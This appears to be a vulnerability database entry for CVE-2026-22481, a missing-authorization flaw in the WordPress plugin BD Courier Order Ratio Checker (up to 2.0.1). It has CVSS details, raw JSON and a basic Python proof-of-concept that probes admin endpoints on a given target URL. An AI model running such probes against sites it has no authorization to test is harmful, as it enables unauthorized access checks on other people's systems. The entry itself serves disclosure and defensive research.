Security Vulnerability Report
中文
CVE-2026-22481 CVSS 4.3 MEDIUM

CVE-2026-22481

Published: 2026-01-22 17:16:36
Last Modified: 2026-04-28 19:36:41

Description

Missing Authorization vulnerability in Rasedul Haque Rumi BD Courier Order Ratio Checker bd-courier-order-ratio-checker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BD Courier Order Ratio Checker: from n/a through <= 2.0.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BD Courier Order Ratio Checker <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22481 PoC - Missing Authorization in BD Courier Order Ratio Checker # Target: WordPress site with vulnerable BD Courier Order Ratio Checker plugin (<=2.0.1) def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-22481 This PoC attempts to access admin functionality without proper authorization """ # Target endpoints that may be vulnerable endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=bd-courier-order-ratio-checker', '/wp-content/plugins/bd-courier-order-ratio-checker/includes/', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Scanner/1.0', 'Content-Type': 'application/x-www-form-urlencoded', } # Low-privilege or unauthenticated request simulation # Try accessing admin functions without proper authorization for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"[*] Testing endpoint: {url}") print(f"[*] Status Code: {response.status_code}") # Check for signs of unauthorized access if response.status_code == 200: if 'admin' in response.text.lower() or 'ratio' in response.text.lower(): print(f"[!] Potential vulnerability detected at {url}") print(f"[!] Response contains sensitive data without authorization check") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {url}: {e}") print("\n[*] Note: This is a basic PoC. Manual verification recommended.") print("[*] Check Patchstack database for detailed exploitation steps.") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2026-22481-poc.py <target_url>") print("Example: python cve-2026-22481-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22481", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:36.013", "lastModified": "2026-04-28T19:36:40.563", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Rasedul Haque Rumi BD Courier Order Ratio Checker bd-courier-order-ratio-checker allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BD Courier Order Ratio Checker: from n/a through <= 2.0.1."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en Rasedul Haque Rumi BD Courier Order Ratio Checker bd-courier-order-ratio-checker permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a BD Courier Order Ratio Checker: desde n/a hasta &lt;= 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bd-courier-order-ratio-checker/vulnerability/wordpress-bd-courier-order-ratio-checker-plugin-2-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}